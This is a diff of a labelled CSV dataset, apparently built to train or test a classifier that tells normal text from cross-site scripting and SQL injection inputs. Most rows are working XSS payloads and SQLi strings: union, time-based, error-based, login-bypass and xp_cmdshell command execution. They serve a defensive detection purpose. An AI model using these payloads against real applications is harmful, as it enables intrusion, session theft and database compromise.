-"<plaintext ondblclick=""alert(1)"">test</plaintext>",1,XSS,6070 -"-6766"" where 6591 = 6591 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,15497 -"-9208%"" ) ) or 8571 = 8571--",2,SQLi,16267 -"1' ) ) union all select null,null,null,null,null#",2,SQLi,17691 -"{""id"":null,""firstName"":""Damien"",""lastName"":""Goh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25699 -"1%' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,18245 -navigator.vibrate(500),1,XSS,9404 -"select * from users where id = 1 or 1#""@ union select 'a',version ( ) -- 1",2,SQLi,11560 -"select * from users where id = 1. union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11943 -Filter the list.,0,normal,23078 -Where's your SQL reference?,0,normal,23587 -"-8929' union all select 5324,5324,5324,5324,5324,5324--",2,SQLi,19406 -AnD SLEEP(5),2,SQLi,10427 -"{""id"":null,""firstName"":""Wufu"",""lastName"":""Shi"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26080 -"1 ) where 8338 = 8338 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,18350 -"select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and ( ( ( ""woun"" like ""woun",2,SQLi,21227 -"1' where 4039 = 4039 union all select null,null,null,null,null,null,null,null--",2,SQLi,19078 -"<nextid onmousemove=""alert(1)"">test</nextid>",1,XSS,1713 -<x oncontextmenu=alert(1)>right click this!,1,XSS,9332 -"<bgsound onmouseleave=""alert(1)"">test</bgsound>",1,XSS,5842 -"<caption draggable=""true"" ondragend=""alert(1)"">test</caption>",1,XSS,3065 -"<legend draggable=""true"" ondragleave=""alert(1)"">test</legend>",1,XSS,6491 -"-7945%' ) ) ) union all select 4286,4286,4286,4286,4286,4286--",2,SQLi,14358 -"<frame onbeforepaste=""alert(1)"" contenteditable>test</frame>",1,XSS,5313 -"1' ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( 'kqip' like 'kqip",2,SQLi,15946 -"1, ( select ( case when ( 7616 = 7616 ) then 1 else 1/ ( select 0 ) end ) )",2,SQLi,12911 -"SELECT 1,2,IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|""XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),?SLEEP(1)))OR""*/ FROM some_table WHERE ex = ample",2,SQLi,22689 -"1 ) as wype where 6608 = 6608 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,20011 -"select * from users where id = 1 or @#"". = 1 or 1 = 1 -- 1",2,SQLi,12030 -Can you help me decide where to go for a jog?,0,normal,23910 -"-7258"" ) as wjjr where 2110 = 2110 union all select 2110,2110,2110,2110,2110,2110,2110,2110,2110--",2,SQLi,18399 -"-8143 union all select 4492,4492,4492,4492,4492,4492,4492,4492,4492#",2,SQLi,20909 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></command>",1,XSS,6758 -1 ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( ( ( 1601 = 1601,2,SQLi,14220 -1') WAITFOR DELAY '0:0:5' AND ('1337'='1337,2,SQLi,11391 -"<ins draggable=""true"" ondragstart=""alert(1)"">test</ins>",1,XSS,5004 -"-2044%' ) ) or elt ( 9299 = 3618,3618 ) and ( ( '%' = '",2,SQLi,13205 -"echo('IPT>alert(""XSS"")</SCRIPT>'); ?>",1,XSS,9821 -"1"" ) ) ) and ( 7396 = 6351 ) *6351 and ( ( ( ""xerw"" like ""xerw",2,SQLi,20699 -Where are my keys?,0,normal,23668 -</script><script>alert('XSS');</script>,1,XSS,253 -"<del onbeforecut=""alert(1)"" contenteditable>test</del>",1,XSS,4966 -onMove,1,XSS,9686 -"><script+src=https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679""></script>",1,XSS,9854 -"<style>@keyframes slidein {}</style><nobr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nobr>",1,XSS,5707 -"<tfoot draggable=""true"" ondragenter=""alert(1)"">test</tfoot>",1,XSS,6036 -"1 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ixlk",2,SQLi,19335 -"<style TYPE=""text/javascript"">document.vulnerable=true;</style>",1,XSS,1457 -"1 where 1656 = 1656 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,20871 -Where's the arena?,0,normal,23721 -"select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual ) ||'",2,SQLi,12378 -Join the language class.,0,normal,22860 -Filter the spam folder for unwanted emails.,0,normal,23165 -"<a href=""%0aalert(1)"" onclick=""protocol='javascript'"">test</a>",1,XSS,169 -<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>,1,XSS,912 -"1 ) ) as fynx where 9636 = 9636 union all select null,null,null,null,null--",2,SQLi,15083 -Select with precision.,0,normal,24625 -"<! foo=""[[[Inception]]""><x foo=""]foo><script>javascript:alert(1)</script>"">",1,XSS,605 -"{""id"":null,""firstName"":""Raymond"",""lastName"":""Yi"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25440 -"<div draggable=""true"" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn>",1,XSS,6429 -"1' ) ) or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'lgcw' = 'lgcw",2,SQLi,22022 -<hr onpointermove=alert(1)>XSS</hr>,1,XSS,7987 -"{""id"":null,""firstName"":""June"",""lastName"":""Lam"",""address"":""3211 E Northeast Loop"",""city"":""299"",""telephone"":""5920542295""}",0,normal,26100 -"1' in boolean mode ) and elt ( 9630 = 4765,4765 ) #",2,SQLi,22131 -"1%"" ) ) or sleep ( 5 ) #",2,SQLi,15567 -"select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( 'hube' = 'hube",2,SQLi,16397 -<col onpointermove=alert(1)>XSS</col>,1,XSS,5077 -"1"" ) ) as tybm where 2687 = 2687 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14420 -1' where 2145 = 2145,2,SQLi,17169 -"1' ) as taay where 7027 = 7027 and elt ( 4249 = 4249,7259 ) --",2,SQLi,14051 -"<time draggable=""true"" ondragend=""alert(1)"">test</time>",1,XSS,4903 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></marquee>",1,XSS,8201 +Locate items where necessary.,0,normal,23214 +"1%' ) ) ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,19241 +or SELECT SLEEP(5); #,2,SQLi,11090 +<tt onblur=alert(1) tabindex=1 id=x></tt><input autofocus>,1,XSS,3486 +"1' ) where 8348 = 8348 and elt ( 4249 = 4249,7259 ) --",2,SQLi,20123 +"data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+",1,XSS,9669 +"1"" where 2072 = 2072 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,20699 +"1"" ) as xrsi where 9498 = 9498",2,SQLi,20438 +"-4550"" ) as hlwe where 6026 = 6026 or ( 9364 = 9593 ) *9593--",2,SQLi,22265 +"javascript:alert(""hellox worldss"")",1,XSS,901 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#",2,SQLi,10445 +"1' in boolean mode ) or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,14650 +"<BGSOUND SRC=""javascript:alert('XSS');"">",1,XSS,260 +"-9638 ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 3679 = 3679",2,SQLi,20685 +"<section onbeforecut=""alert(1)"" contenteditable>test</section>",1,XSS,6078 +"1' ) ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'yiem' = 'yiem",2,SQLi,15778 +-8248 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ),2,SQLi,15309 +"<hr onmousemove=""alert(1)"">test</hr>",1,XSS,8643 +"iif ( 7889 = 5114,1,1/0 )",2,SQLi,12100 +<shadow onpointermove=alert(1)>XSS</shadow>,1,XSS,6109 +1%' ) and 9198 = 9198--,2,SQLi,17724 +<dl onpointerenter=alert(1)>XSS</dl>,1,XSS,7347 +"1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'pbqg' = 'pbqg",2,SQLi,18084 +"1"" ) as evoq where 8193 = 8193 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14119 +"1 ) ) and elt ( 4249 = 4249,7259 ) and ( ( 5683 = 5683",2,SQLi,20660 +if ( 8264 = 1939 ) select 8264 else drop function nsoq--,2,SQLi,15228 +"select * from users where id = 1 or 1#"". = 1 union select 1,version ( ) -- 1",2,SQLi,11840 +"<header draggable=""true"" ondragend=""alert(1)"">test</header>",1,XSS,4851 +"1%' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,18824 +"<i onmousedown=""alert(1)"">test</i>",1,XSS,8346 +1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( 'prjf' = 'prjf,2,SQLi,12788 +"><h1><IFRAME width=420"" height=""315"" SRC=""http://www.youtube.com/embed/sxvccpasgTE"" frameborder=""0"" onmouseover=""alert(document.cookie)""></IFRAME>123</h1>",1,XSS,1200 +"-7347"" ) ) union all select 4360,4360,4360,4360,4360,4360,4360,4360,4360#",2,SQLi,18114 +select ( case when ( 5740 = 7636 ) then 5740 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,12390 +"&lt;A HREF=\""//www&#46;google&#46;com/\""&gt;XSS&lt;/A&gt;",1,XSS,1010 +<strong onpointermove=alert(1)>XSS</strong>,1,XSS,4931 +log,0,normal,23177 +"But the fibre produced by these rapid and economical means was very inferior in quality to the product of Maori handiwork, mainly because weak and undeveloped strands are, by machine preparation, unavoidably intermixed with the perfect fibres, which alone the Maoris select, and so the uniform quality and strength of the material are destroyed.",0,normal,26261 +1'+ ( select 'vnue' where 5807 = 5807,2,SQLi,14356 +I need to select a movie for our movie night.,0,normal,23802 +-3849 ) or 5580 = 3442--,2,SQLi,14446 +<footer onpointerover=alert(1)>XSS</footer>,1,XSS,6231 +# from wapiti,2,SQLi,10243 +1 ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ),2,SQLi,16418 +"1%"" ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( ""%"" = """,2,SQLi,19033 +"<dialog oncopy=""alert(1)"" contenteditable>test</dialog>",1,XSS,2901 +<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#,1,XSS,9001 +"<ol onmouseup=""alert(1)"">test</ol>",1,XSS,8542 +"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric )",2,SQLi,12401 +"1"" ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16074 +"perl -e ';print "";&;<;SCR\0IPT>;alert("";XSS"";)<;/SCR\0IPT>;"";;'; >; out",1,XSS,1585 +"-6554' ) ) ) union all select 4384,4384,4384,4384,4384#",2,SQLi,14903 +"admin"" or 1 = 1/*",2,SQLi,11783 +"1"" ) ) ) union all select null,null,null#",2,SQLi,17673 +if ( 2643 = 1393 ) select 2643 else drop function nqss--,2,SQLi,19652 +1 ) ) as qgma where 7675 = 7675 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,18833 +"1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'lwir' like 'lwir",2,SQLi,19694 +<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus>,1,XSS,4573 +"1 ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( ( 2952 = 2952",2,SQLi,21393 +<header onpointerleave=alert(1)>XSS</header>,1,XSS,6504 +"1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'uzxr' = 'uzxr",2,SQLi,15896 +"<multicol draggable=""true"" ondragstart=""alert(1)"">test</multicol>",1,XSS,2507 +"1"" ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""ksrh"" = ""ksrh",2,SQLi,21999 +"1' ) where 7322 = 7322 and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,22338 +"ABC<div style=""x:\xC2\xA0expression(javascript:alert(1)"">DEF",1,XSS,450 +Select a painting style to explore.,0,normal,23998 +"select * from generate_series ( 6468,6468,case when ( 6468 = 7999 ) then 1 else 0 end ) limit 1--",2,SQLi,22096 +"<script oncut=""alert(1)"" contenteditable>test</script>",1,XSS,2639 +"<slot onbeforecut=""alert(1)"" contenteditable>test</slot>",1,XSS,7572 +"-7635"" union all select 1284,1284,1284,1284,1284,1284#",2,SQLi,12363 +"=+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23",2,SQLi,22493 +-8007' ) ) as bgpp where 9555 = 9555 or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,12433 +"<noscript onkeydown=""alert(1)"" contenteditable>test</noscript>",1,XSS,2535 +ORDER BY 6,2,SQLi,10204 +"-7860' ) ) ) union all select 7420,7420,7420,7420,7420,7420,7420,7420,7420,7420--",2,SQLi,13647 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,10907 +"<menu oncut=""alert(1)"" contenteditable>test</menu>",1,XSS,6978 +Select the perfect angle for the photo.,0,normal,23973 +"1"" where 3484 = 3484 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,14963 +1 and sleep ( 5 ) # qcyj,2,SQLi,16869 +OR x=y,2,SQLi,10095 +exec master..xp_cmdshell 'net+users',2,SQLi,9972 +-6030%' ) or 3038 = 3038,2,SQLi,13534 +1 ) as nwfz where 7365 = 7365 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --,2,SQLi,17844 +Select your fight.,0,normal,24880 +1%' ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( '%' = ',2,SQLi,17630 +"1 ) or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 2303 = 2303",2,SQLi,21172 +<b id=x tabindex=1 onfocus=alert(1)></b>,1,XSS,6357 +"<style>:target {color:red;}</style><xmp id=x style=""transition:color 1s"" ontransitionend=alert(1)></xmp>",1,XSS,5502 +<input3 onpointerleave=alert(1)>XSS</input3>,1,XSS,2169 +He selected a song to play during the ceremony.,0,normal,23820 +"<nobr oncut=""alert(1)"" contenteditable>test</nobr>",1,XSS,4753 +select ( case when ( 4291 = 6937 ) then 4291 else 4291* ( select 4291 from mysql.db ) end ) #,2,SQLi,18454 +"<big onmousemove=""alert(1)"">test</big>",1,XSS,4160 +"<br onmouseleave=""alert(1)"">test</br>",1,XSS,6124 +or 1 in (select @@version)--,2,SQLi,10064 +"<legend ondblclick=""alert(1)"">test</legend>",1,XSS,5153 +Merge records.,0,normal,23042 +1'+ ( select lqhd where 4251 = 4251 and ( 8754 = 5779 ) *5779 ) +',2,SQLi,16023 +"<br draggable=""true"" ondrag=""alert(1)"">test</br>",1,XSS,5027 +"<style>:target {transform: rotate(180deg);}</style><td id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></td>",1,XSS,5943 +"<div draggable=""true"" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button>",1,XSS,6801 +Calculate totals where needed.,0,normal,23429 +"&lt;A HREF=\""http&#58;//1113982867/\""&gt;XSS&lt;/A&gt;",1,XSS,1006 +"-1894' ) union all select 8123,8123,8123,8123,8123,8123,8123,8123,8123#",2,SQLi,16996 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*",2,SQLi,10891 +"<colgroup onmouseenter=""alert(1)"">test</colgroup>",1,XSS,3278 +"-5165' ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'zpnv' like 'zpnv",2,SQLi,17614 +Where's the nearest ATM?,0,normal,23456 +Select reset.,0,normal,24590 +"1%' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and '%' = '",2,SQLi,15584 +<img id=x tabindex=1 ondeactivate=alert(1)></img><input id=y autofocus>,1,XSS,4038 +"<style>@keyframes x{}</style><i style=""animation-name:x"" onanimationstart=""alert(1)""></i>",1,XSS,2593 +&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-,1,XSS,1373 +Find and select Users & Groups from the System Preferences menu.,0,normal,26151 +1' in boolean mode ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) #,2,SQLi,17978 +"<center onbeforepaste=""alert(1)"" contenteditable>test</center>",1,XSS,6408 +"<i onbeforepaste=""alert(1)"" contenteditable>test</i>",1,XSS,5501 +-4947' order by 1#,2,SQLi,16297 +"1 ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,12767 +"-3370' in boolean mode ) union all select 3432,3432,3432,3432#",2,SQLi,19907 +1' where 2145 = 2145,2,SQLi,16990 +"<style>@keyframes x{}</style><blink style=""animation-name:x"" onanimationstart=""alert(1)""></blink>",1,XSS,6904 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></article>",1,XSS,3231 +<x 1='1'onxxx=1,1,XSS,9280 +"-7715' ) union all select 4830,4830,4830,4830,4830,4830,4830,4830--",2,SQLi,15020 +"&lt;BODY BACKGROUND=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,931 +<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus>,1,XSS,8055 +-9429' ) order by 1--,2,SQLi,18473 +"-3194"" ) ) ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) and ( ( ( ""erua"" = ""erua",2,SQLi,16592 +"<frameset onpaste=""alert(1)"" contenteditable>test</frameset>",1,XSS,2215 +"admin"" or ""1""=""1""/*",2,SQLi,9892 +Filter data where needed.,0,normal,23423 +"iif ( 2840 = 3788,1,1/0 )",2,SQLi,19665 +<datalist id=x tabindex=1 onfocus=alert(1)></datalist>,1,XSS,4942 +select ( case when ( 6287 = 8341 ) then 6287 else 1/ ( select 0 ) end ) --,2,SQLi,21911 "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> -`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>",1,XSS,9599 -"1"" ) where 5850 = 5850 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) --",2,SQLi,17741 -"<style>@keyframes slidein {}</style><rt style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></rt>",1,XSS,2586 -"=+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--",2,SQLi,22708 -"<audio onbeforepaste=""alert(1)"" contenteditable>test</audio>",1,XSS,2224 -"1"" where 2512 = 2512 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,17825 -"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--",2,SQLi,10690 -1' WAITFOR DELAY '0:0:5' AND '1337'='1337,2,SQLi,11390 -"1"" ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ""rwlq"" = ""rwlq",2,SQLi,21266 -"<rtc draggable=""true"" ondrag=""alert(1)"">test</rtc>",1,XSS,3656 --6203' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ( ( 'luee' = 'luee,2,SQLi,21808 -"-1065 ) ) union all select 7437,7437,7437,7437,7437,7437,7437,7437--",2,SQLi,12403 -"1"" ) ) as itxo where 7916 = 7916",2,SQLi,14275 -"-4721' ) or elt ( 4378 = 5165,5165 ) and ( 'fufn' = 'fufn",2,SQLi,17986 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></track>",1,XSS,7317 -"<a href=""\x0Fjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,469 -"-7379 union all select 9813,9813,9813,9813,9813,9813,9813,9813--",2,SQLi,16723 -<sup onpointerdown=alert(1)>XSS</sup>,1,XSS,5866 -"select count ( * ) from generate_series ( 1,5000000 ) and ( ( ""%"" = """,2,SQLi,22240 -"1' ) where 7640 = 7640 and make_set ( 8978 = 8594,8594 ) --",2,SQLi,15047 -1'|| ( select 'pcps' from dual where 7255 = 7255 and 7121 = 4603,2,SQLi,21342 -"{""id"":null,""firstName"":""勤生"",""lastName"":""勤生"",""address"":""3718 S Main St"",""city"":""207"",""telephone"":""1933640675""}",0,normal,25965 -1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,15783 -"1' ) ) as jmnw where 6496 = 6496 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,15907 -"` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11334 -"1 ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( 4348 = 4348",2,SQLi,13906 -"<table><TD BACKGROUND=""javascript:document.vulnerable=true;"">",1,XSS,1449 -"-3924'|| ( select 'ssld' from dual where 6229 = 6229 union all select 6229,6229,6229,6229,6229#",2,SQLi,21750 -<dl id=x tabindex=1 onfocusin=alert(1)></dl>,1,XSS,6567 -"1'+ ( select 'ycvl' where 8415 = 8415 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,18267 -Select the best recipe.,0,normal,24523 -"1 or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) # msrb",2,SQLi,12692 -select * from sysusers,2,SQLi,10078 -"javascript://</title></textarea></style></script --><li '//"" '*/alert()/*', onclick=alert()//",1,XSS,9572 -"1'|| ( select 'setd' from dual where 3686 = 3686 ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) ) ||'",2,SQLi,14018 -1%' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( '%' = ',2,SQLi,13829 -"-5513"" ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""ovmk"" like ""ovmk",2,SQLi,22203 -"1'|| ( select 'cozi' from dual where 2607 = 2607 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,16067 -1%' ) waitfor delay '0:0:5' and ( '%' = ',2,SQLi,18930 -Select wine.,0,normal,23254 -"1"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""aall"" like ""aall",2,SQLi,22010 -"1' ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) 